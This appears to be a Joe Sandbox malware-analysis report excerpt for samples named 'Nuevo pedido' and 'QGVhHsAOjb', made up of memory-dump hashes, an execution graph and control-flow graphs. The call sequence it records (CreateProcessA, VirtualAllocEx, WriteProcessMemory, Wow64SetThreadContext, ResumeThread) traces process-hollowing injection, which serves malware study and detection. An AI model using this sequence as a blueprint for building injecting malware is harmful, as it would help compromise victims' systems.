                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4dcde515c984d4b5cae373046bf77640c605e9d9d5467ff777bff6011b362a04
                                                                                                                                            • Instruction ID: bbcc95937b2db23637a3fb24afa1c83a6cabae55ea96ac37294cecd3ccd29796
                                                                                                                                            • Opcode Fuzzy Hash: 4dcde515c984d4b5cae373046bf77640c605e9d9d5467ff777bff6011b362a04
                                                                                                                                            • Instruction Fuzzy Hash: DD01E474E0020ADFCF01CFA9E4449AEBBB1FB49304F10856AE924A3350D7789A96CF91
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b74db13da90b4a050e4833b024fd1b30f52aa4b4b47f61de646b0275a3a6a337
                                                                                                                                            • Instruction ID: c183ad30758cbf05dfacfe8cd278f7257779308d03131f6347107b114e8ba5c6
                                                                                                                                            • Opcode Fuzzy Hash: b74db13da90b4a050e4833b024fd1b30f52aa4b4b47f61de646b0275a3a6a337
                                                                                                                                            • Instruction Fuzzy Hash: D7E02031D543578BC702D7F09C000EEBB349DC2121B18855BC0A537050EF30211AC352
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 61ed3a306516daf68ba77d7dd6a862106890ec8255b4401aa426eb0fdead140c
                                                                                                                                            • Instruction ID: 38500f3bade9f6392afe9a83f925e0f025d31839c3fe1b8d4446b912d8b1d3f2
                                                                                                                                            • Opcode Fuzzy Hash: 61ed3a306516daf68ba77d7dd6a862106890ec8255b4401aa426eb0fdead140c
                                                                                                                                            • Instruction Fuzzy Hash: 72D01231D2022A578B00AAA5DC044EEB738EE95665B504626D55437140EB70665986A2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9f4cb2481f32472d10961b02c75e49565298bf9aea94da8a488b13a6cf3f20b9
                                                                                                                                            • Instruction ID: dc4910b3918494294202d0284c3520cecf7913059d563f67e4cf6100fde0a33f
                                                                                                                                            • Opcode Fuzzy Hash: 9f4cb2481f32472d10961b02c75e49565298bf9aea94da8a488b13a6cf3f20b9
                                                                                                                                            • Instruction Fuzzy Hash: C9D05E3204431A0EC201FBB9ED557D6BB2AEBD0258F15852094054A35AEEB898D946A0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7aa7363894a3d08e3b25434d40bfeaf1dab11b37d56c9e609b6da69f10e78f87
                                                                                                                                            • Instruction ID: 270830536bf328f0576e7f0a01b449ccca6960f7aa439b1a31157466953762f4
                                                                                                                                            • Opcode Fuzzy Hash: 7aa7363894a3d08e3b25434d40bfeaf1dab11b37d56c9e609b6da69f10e78f87
                                                                                                                                            • Instruction Fuzzy Hash: D7D0E235E4000CCBCB20DFB8E4848DCFB71EF48361B10542AD925E3210C6305461CF04
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b4cdaa7f61b034390ea9272f63ff61f21f06ddb4c4bf4efa987219980a076e51
                                                                                                                                            • Instruction ID: d7faa909221bd86dbc1fd2e6c0f6e6abf544311082ec4000c9247391180c5ebe
                                                                                                                                            • Opcode Fuzzy Hash: b4cdaa7f61b034390ea9272f63ff61f21f06ddb4c4bf4efa987219980a076e51
                                                                                                                                            • Instruction Fuzzy Hash: AED0673AB40018DFCB059F99E8408DDF7B6FB98261B148516E915E3261CA319925DB54
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6313f6da70077a1baa02594a83b237fc387a92e01d38776ae6d388d4b7bd0f0b
                                                                                                                                            • Instruction ID: fc5f1f6c31ecd3e9c88756f4fbbb38a63f71ad6964bb7e5bc1537d3bac6c48fe
                                                                                                                                            • Opcode Fuzzy Hash: 6313f6da70077a1baa02594a83b237fc387a92e01d38776ae6d388d4b7bd0f0b
                                                                                                                                            • Instruction Fuzzy Hash: EFC0123044430D4EC541FBB6ED45555B76EF6E0244740852094050A75DDFF89CDA4794
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                            • API String ID: 0-3001612457
                                                                                                                                            • Opcode ID: 73f1acf2551a8d93594fd46224ffa49a658877ae10cbf20577c77f24ff0f7562
                                                                                                                                            • Instruction ID: 36fb587cc6089765615c156bb70be41b74081f421d9ea6fade5e3f99a8e87937
                                                                                                                                            • Opcode Fuzzy Hash: 73f1acf2551a8d93594fd46224ffa49a658877ae10cbf20577c77f24ff0f7562
                                                                                                                                            • Instruction Fuzzy Hash: 7801BC32B40A048FCB2C8E2DC564A2637FFAFC8AA0725446BE646CB3B4DA31DC41C750

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:10.5%
                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                            Signature Coverage:2.5%
                                                                                                                                            Total number of Nodes:204
                                                                                                                                            Total number of Limit Nodes:14
                                                                                                                                            execution_graph 49860 2f0acb0 49864 2f0ad97 49860->49864 49869 2f0ada8 49860->49869 49861 2f0acbf 49865 2f0addc 49864->49865 49866 2f0adb9 49864->49866 49865->49861 49866->49865 49867 2f0afe0 GetModuleHandleW 49866->49867 49868 2f0b00d 49867->49868 49868->49861 49870 2f0addc 49869->49870 49871 2f0adb9 49869->49871 49870->49861 49871->49870 49872 2f0afe0 GetModuleHandleW 49871->49872 49873 2f0b00d 49872->49873 49873->49861 49915 2f0d690 DuplicateHandle 49916 2f0d726 49915->49916 50110 2f0d040 50111 2f0d086 GetCurrentProcess 50110->50111 50113 2f0d0d1 50111->50113 50114 2f0d0d8 GetCurrentThread 50111->50114 50113->50114 50115 2f0d115 GetCurrentProcess 50114->50115 50116 2f0d10e 50114->50116 50117 2f0d14b 50115->50117 50116->50115 50118 2f0d173 GetCurrentThreadId 50117->50118 50119 2f0d1a4 50118->50119 49883 8bd1a28 49884 8bd1a4c 49883->49884 49885 8bd1a53 49883->49885 49889 8bd1a7a 49885->49889 49890 8bd04ac 49885->49890 49888 8bd04ac GetCurrentThreadId 49888->49889 49891 8bd04b7 49890->49891 49892 8bd1d8f GetCurrentThreadId 49891->49892 49893 8bd1a70 49891->49893 49892->49893 49893->49888 49874 50e3bc8 49875 50e3d53 49874->49875 49876 50e3bee 49874->49876 49876->49875 49879 50e3e48 PostMessageW 49876->49879 49881 50e3e43 PostMessageW 49876->49881 49880 50e3eb4 49879->49880 49880->49876 49882 50e3eb4 49881->49882 49882->49876 49894 2f04668 49895 2f0467a 49894->49895 49896 2f04686 49895->49896 49898 2f04779 49895->49898 49899 2f0479d 49898->49899 49903 2f04888 49899->49903 49907 2f04879 49899->49907 49904 2f048af 49903->49904 49905 2f0498c 49904->49905 49911 2f044c4 49904->49911 49909 2f048af 49907->49909 49908 2f0498c 49908->49908 49909->49908 49910 2f044c4 CreateActCtxA 49909->49910 49910->49908 49912 2f05918 CreateActCtxA 49911->49912 49914 2f059db 49912->49914 49917 50e11e3 49922 50e2a08 49917->49922 49940 50e29f8 49917->49940 49958 50e2a66 49917->49958 49918 50e11fd 49923 50e2a22 49922->49923 49931 50e2a46 49923->49931 49977 50e324e 49923->49977 49981 50e2e91 49923->49981 49986 50e3533 49923->49986 49993 50e33f2 49923->49993 50003 50e35d2 49923->50003 50011 50e3737 49923->50011 50015 50e34f6 49923->50015 50019 50e2f96 49923->50019 50023 50e3299 49923->50023 50028 50e2dff 49923->50028 50034 50e37bf 49923->50034 50038 50e357e 49923->50038 50046 50e31a5 49923->50046 50050 50e344a 49923->50050 50055 50e2e2f 49923->50055 49931->49918 49941 50e2a22 49940->49941 49942 50e324e 2 API calls 49941->49942 49943 50e2e2f 2 API calls 49941->49943 49944 50e344a 4 API calls 49941->49944 49945 50e31a5 ResumeThread 49941->49945 49946 50e2a46 49941->49946 49947 50e357e 5 API calls 49941->49947 49948 50e37bf 3 API calls 49941->49948 49949 50e2dff 2 API calls 49941->49949 49950 50e3299 3 API calls 49941->49950 49951 50e2f96 3 API calls 49941->49951 49952 50e34f6 ResumeThread 49941->49952 49953 50e3737 ResumeThread 49941->49953 49954 50e35d2 5 API calls 49941->49954 49955 50e33f2 6 API calls 49941->49955 49956 50e3533 5 API calls 49941->49956 49957 50e2e91 2 API calls 49941->49957 49942->49946 49943->49946 49944->49946 49945->49946 49946->49918 49947->49946 49948->49946 49949->49946 49950->49946 49951->49946 49952->49946 49953->49946 49954->49946 49955->49946 49956->49946 49957->49946 49959 50e29f4 49958->49959 49961 50e2a69 49958->49961 49960 50e2a46 49959->49960 49962 50e324e 2 API calls 49959->49962 49963 50e2e2f 2 API calls 49959->49963 49964 50e344a 4 API calls 49959->49964 49965 50e31a5 ResumeThread 49959->49965 49966 50e357e 5 API calls 49959->49966 49967 50e37bf 3 API calls 49959->49967 49968 50e2dff 2 API calls 49959->49968 49969 50e3299 3 API calls 49959->49969 49970 50e2f96 3 API calls 49959->49970 49971 50e34f6 ResumeThread 49959->49971 49972 50e3737 ResumeThread 49959->49972 49973 50e35d2 5 API calls 49959->49973 49974 50e33f2 6 API calls 49959->49974 49975 50e3533 5 API calls 49959->49975 49976 50e2e91 2 API calls 49959->49976 49960->49918 49961->49918 49962->49960 49963->49960 49964->49960 49965->49960 49966->49960 49967->49960 49968->49960 49969->49960 49970->49960 49971->49960 49972->49960 49973->49960 49974->49960 49975->49960 49976->49960 50060 50e0b38 49977->50060 50064 50e0b30 49977->50064 49978 50e327a 49982 50e2e33 49981->49982 50068 50e0cc4 49982->50068 50072 50e0cd0 49982->50072 50076 50e08a8 49986->50076 50080 50e0980 49986->50080 50087 50e08b0 49986->50087 49987 50e31bc 49988 50e3907 49987->49988 50091 767fba0 49987->50091 49988->49931 49994 50e340c 49993->49994 50001 50e0980 2 API calls 49994->50001 50002 50e0a40 2 API calls 49994->50002 50106 50e0988 49994->50106 49995 50e32b0 49996 50e3697 49995->49996 50095 50e0a48 49995->50095 50099 50e0a40 49995->50099 49996->49931 49997 50e32d1 49997->49931 50001->49995 50002->49995 50004 50e3532 50003->50004 50006 50e31bc 50004->50006 50008 50e08a8 Wow64SetThreadContext 50004->50008 50009 50e0980 2 API calls 50004->50009 50010 50e08b0 Wow64SetThreadContext 50004->50010 50005 50e3907 50005->49931 50006->50005 50007 767fba0 ResumeThread 50006->50007 50007->50006 50008->50006 50009->50006 50010->50006 50012 50e31bc 50011->50012 50013 50e3907 50012->50013 50014 767fba0 ResumeThread 50012->50014 50013->49931 50014->50012 50016 50e31bc 50015->50016 50017 50e3907 50016->50017 50018 767fba0 ResumeThread 50016->50018 50017->49931 50018->50016 50021 50e0a48 WriteProcessMemory 50019->50021 50022 50e0a40 2 API calls 50019->50022 50020 50e2f82 50020->49931 50021->50020 50022->50020 50024 50e329f 50023->50024 50026 50e0a48 WriteProcessMemory 50024->50026 50027 50e0a40 2 API calls 50024->50027 50025 50e32d1 50025->49931 50026->50025 50027->50025 50030 50e2e15 50028->50030 50029 50e2e21 50029->49931 50030->50029 50032 50e0cc4 CreateProcessA 50030->50032 50033 50e0cd0 CreateProcessA 50030->50033 50031 50e2f57 50031->50031 50032->50031 50033->50031 50036 50e0a48 WriteProcessMemory 50034->50036 50037 50e0a40 2 API calls 50034->50037 50035 50e37ed 50036->50035 50037->50035 50039 50e3532 50038->50039 50040 50e31bc 50039->50040 50042 50e08a8 Wow64SetThreadContext 50039->50042 50043 50e0980 2 API calls 50039->50043 50044 50e08b0 Wow64SetThreadContext 50039->50044 50041 50e3907 50040->50041 50045 767fba0 ResumeThread 50040->50045 50041->49931 50042->50040 50043->50040 50044->50040 50045->50040 50047 50e31ab 50046->50047 50048 50e3907 50047->50048 50049 767fba0 ResumeThread 50047->50049 50048->49931 50049->50047 50052 50e08a8 Wow64SetThreadContext 50050->50052 50053 50e0980 2 API calls 50050->50053 50054 50e08b0 Wow64SetThreadContext 50050->50054 50051 50e3464 50052->50051 50053->50051 50054->50051 50056 50e2eb7 50055->50056 50058 50e0cc4 CreateProcessA 50056->50058 50059 50e0cd0 CreateProcessA 50056->50059 50057 50e2f57 50057->50057 50058->50057 50059->50057 50061 50e0b83 ReadProcessMemory 50060->50061 50063 50e0bc7 50061->50063 50063->49978 50065 50e0b83 ReadProcessMemory 50064->50065 50067 50e0bc7 50065->50067 50067->49978 50069 50e0d59 CreateProcessA 50068->50069 50071 50e0f1b 50069->50071 50073 50e0d59 CreateProcessA 50072->50073 50075 50e0f1b 50073->50075 50075->50075 50077 50e08f5 Wow64SetThreadContext 50076->50077 50079 50e093d 50077->50079 50079->49987 50081 50e0908 Wow64SetThreadContext 50080->50081 50082 50e0983 VirtualAllocEx 50080->50082 50086 50e093d 50081->50086 50085 50e0a05 50082->50085 50085->49987 50086->49987 50088 50e08f5 Wow64SetThreadContext 50087->50088 50090 50e093d 50088->50090 50090->49987 50092 767fbe0 ResumeThread 50091->50092 50094 767fc11 50092->50094 50094->49987 50096 50e0a90 WriteProcessMemory 50095->50096 50098 50e0ae7 50096->50098 50098->49997 50100 50e09c8 VirtualAllocEx 50099->50100 50103 50e0a43 WriteProcessMemory 50099->50103 50102 50e0a05 50100->50102 50102->49997 50105 50e0ae7 50103->50105 50105->49997 50107 50e09c8 VirtualAllocEx 50106->50107 50109 50e0a05 50107->50109 50109->49995

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1395 50e0a40-50e0a41 1396 50e09c8-50e0a03 VirtualAllocEx 1395->1396 1397 50e0a43-50e0a96 1395->1397 1400 50e0a0c-50e0a31 1396->1400 1401 50e0a05-50e0a0b 1396->1401 1403 50e0a98-50e0aa4 1397->1403 1404 50e0aa6-50e0ae5 WriteProcessMemory 1397->1404 1401->1400 1403->1404 1409 50e0aee-50e0b1e 1404->1409 1410 50e0ae7-50e0aed 1404->1410 1410->1409
                                                                                                                                            APIs
                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 050E09F6
                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 050E0AD8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocMemoryProcessVirtualWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 645232735-0
                                                                                                                                            • Opcode ID: 4c8896a667e8ca744fa5fca6e01f3e7fb8338006c4763966a993b572423633df
                                                                                                                                            • Instruction ID: adfa13ac139beffb03fca8424f6a5fd907c2421b9c12ed5a9021e58fe5f05b91
                                                                                                                                            • Opcode Fuzzy Hash: 4c8896a667e8ca744fa5fca6e01f3e7fb8338006c4763966a993b572423633df
                                                                                                                                            • Instruction Fuzzy Hash: 8F4178B290020D9FDB10DFA9D845BEEBBF1FF88314F20842AE559A7250C7799594CBA0

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1047 2f0d031-2f0d0cf GetCurrentProcess 1051 2f0d0d1-2f0d0d7 1047->1051 1052 2f0d0d8-2f0d10c GetCurrentThread 1047->1052 1051->1052 1053 2f0d115-2f0d149 GetCurrentProcess 1052->1053 1054 2f0d10e-2f0d114 1052->1054 1056 2f0d152-2f0d16d call 2f0d618 1053->1056 1057 2f0d14b-2f0d151 1053->1057 1054->1053 1060 2f0d173-2f0d1a2 GetCurrentThreadId 1056->1060 1057->1056 1061 2f0d1a4-2f0d1aa 1060->1061 1062 2f0d1ab-2f0d20d 1060->1062 1061->1062
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 02F0D0BE
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02F0D0FB
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 02F0D138
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02F0D191
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: 4b1e0c08db8a8854f2aa7ba9b9af1388e2da7dc764cb38fc8b087679861c21d7
                                                                                                                                            • Instruction ID: a6c8bb1fb766afbee54b705dd8158ab245533829b07ec26789da63c6028ee6aa
                                                                                                                                            • Opcode Fuzzy Hash: 4b1e0c08db8a8854f2aa7ba9b9af1388e2da7dc764cb38fc8b087679861c21d7
                                                                                                                                            • Instruction Fuzzy Hash: 8C5157B4900209CFEB15CFA9D588BDEBBF5EF88348F208459D119A72A0DB349844CF65

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1069 2f0d040-2f0d0cf GetCurrentProcess 1073 2f0d0d1-2f0d0d7 1069->1073 1074 2f0d0d8-2f0d10c GetCurrentThread 1069->1074 1073->1074 1075 2f0d115-2f0d149 GetCurrentProcess 1074->1075 1076 2f0d10e-2f0d114 1074->1076 1078 2f0d152-2f0d16d call 2f0d618 1075->1078 1079 2f0d14b-2f0d151 1075->1079 1076->1075 1082 2f0d173-2f0d1a2 GetCurrentThreadId 1078->1082 1079->1078 1083 2f0d1a4-2f0d1aa 1082->1083 1084 2f0d1ab-2f0d20d 1082->1084 1083->1084
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 02F0D0BE
                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02F0D0FB
                                                                                                                                            • GetCurrentProcess.KERNEL32 ref: 02F0D138
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02F0D191
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Current$ProcessThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2063062207-0
                                                                                                                                            • Opcode ID: 657746f10fd46115e90a1663c07278fb4879ba3be06e94035c6b145d9d4c20a1
                                                                                                                                            • Instruction ID: 23845514a41c0216f33a65333be03ebdf80a050d37b51dae8a13cd6770b555c5
                                                                                                                                            • Opcode Fuzzy Hash: 657746f10fd46115e90a1663c07278fb4879ba3be06e94035c6b145d9d4c20a1
                                                                                                                                            • Instruction Fuzzy Hash: 745146B09002098FEB14DFAAD588BDEBBF5EF88348F208459D118A73A0DB749844CF65

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 1414 50e0980-50e0981 1415 50e0908-50e093b Wow64SetThreadContext 1414->1415 1416 50e0983-50e0a03 VirtualAllocEx 1414->1416 1420 50e093d-50e0943 1415->1420 1421 50e0944-50e0974 1415->1421 1422 50e0a0c-50e0a31 1416->1422 1423 50e0a05-50e0a0b 1416->1423 1420->1421 1423->1422
                                                                                                                                            APIs
                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 050E092E
                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 050E09F6
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AllocContextThreadVirtualWow64
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2727713192-0
                                                                                                                                            • Opcode ID: 2755bec709fb1610849f71c6dd0a21790eaf274e5ab9b68080bb495984309522
                                                                                                                                            • Instruction ID: 20d1a772e313b6cc907b5b06639642ed874ca4a2d1c0e5e7afa171cf529c850d
                                                                                                                                            • Opcode Fuzzy Hash: 2755bec709fb1610849f71c6dd0a21790eaf274e5ab9b68080bb495984309522
                                                                                                                                            • Instruction Fuzzy Hash: 8A319C728002498FDB20DFA9D4497EEFFF1EF88324F248419D459A7250CB799585CFA0
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                                            • API String ID: 0-4258043069
                                                                                                                                            • Opcode ID: c8bd021651bd46ee36572f3a365429f3c1cf111a8942f650775a498dc1bae532
                                                                                                                                            • Instruction ID: 4f7d99555eb19ce0178bc734b488a3b47a217e13d8f602f3d427322ef3478a09
                                                                                                                                            • Opcode Fuzzy Hash: c8bd021651bd46ee36572f3a365429f3c1cf111a8942f650775a498dc1bae532
                                                                                                                                            • Instruction Fuzzy Hash: 75817C74E003199FCB14DFA9C8846AEBBF6FF89340F14852AE409BB351DB349905CB95
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1780411946.0000000005710000.00000040.00000800.00020000.00000000.sdmp, Offset: 05710000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_5710000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 4'^q$4'^q
                                                                                                                                            • API String ID: 0-2697143702
                                                                                                                                            • Opcode ID: 013b53215006a39845f2f93f726ac684a0e3f513f9d4025d901db23db228d500
                                                                                                                                            • Instruction ID: 62d6d67bfcc316160a1612fcdcab6069ea6fda4f816e7d31034b2ccbce4b792f
                                                                                                                                            • Opcode Fuzzy Hash: 013b53215006a39845f2f93f726ac684a0e3f513f9d4025d901db23db228d500
                                                                                                                                            • Instruction Fuzzy Hash: DA516F32D1170A9BDB04EFA8EC447D9F372FF94314F658A29D508BB251EB746989CB80
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 050E0F06
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                            • Opcode ID: f8c55107f9ecf9e80c0d439eaf14d911ef403783a4dc53c165ba7bc3e949ebc9
                                                                                                                                            • Instruction ID: 353d564c165b05cd1ad18cc4416f0554b8f3efda69ad7290e74d6cc554133fd5
                                                                                                                                            • Opcode Fuzzy Hash: f8c55107f9ecf9e80c0d439eaf14d911ef403783a4dc53c165ba7bc3e949ebc9
                                                                                                                                            • Instruction Fuzzy Hash: FAA1AC70D00219DFDB20CFA8D855BEDBBF2BF44314F2481A9E849A7290DBB49985CF91
                                                                                                                                            APIs
                                                                                                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 050E0F06
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1779805049.00000000050E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050E0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_50e0000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                            • Opcode ID: 2ace333cb0722eaf266027812f319e4cebb81a837f8d404f1479b23ed06d5c10
                                                                                                                                            • Instruction ID: f9ac5c6999909ada9d1b856b35ac3c9b24ef847f71c953a94ed6ebe62a6d1594
                                                                                                                                            • Opcode Fuzzy Hash: 2ace333cb0722eaf266027812f319e4cebb81a837f8d404f1479b23ed06d5c10
                                                                                                                                            • Instruction Fuzzy Hash: DB919C70D00619DFDB20CF68D855BEDBBF2BF48314F1481A9E809A7290DBB49985CF91
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 02F0AFFE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HandleModule
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                            • Opcode ID: 2af448a7eca9893d76e522f504939d80956cce812fa4723b36c33627e025ee75
                                                                                                                                            • Instruction ID: c154a49d401bcd950dd0b75c12273c437e3b0ca1e9de5d0345972503f1968c4c
                                                                                                                                            • Opcode Fuzzy Hash: 2af448a7eca9893d76e522f504939d80956cce812fa4723b36c33627e025ee75
                                                                                                                                            • Instruction Fuzzy Hash: BA712870A00B058FD724DF2AD48475ABBF1BF88344F00892DD686D7A90D775E849CB90
                                                                                                                                            APIs
                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02F059C9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.1776138099.0000000002F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_2f00000_QGVhHsAOjb.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Create
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                            • Opcode ID: accad03772c05c9873e8d866e88950bc37a08126b478b28e0b2f264c65884377
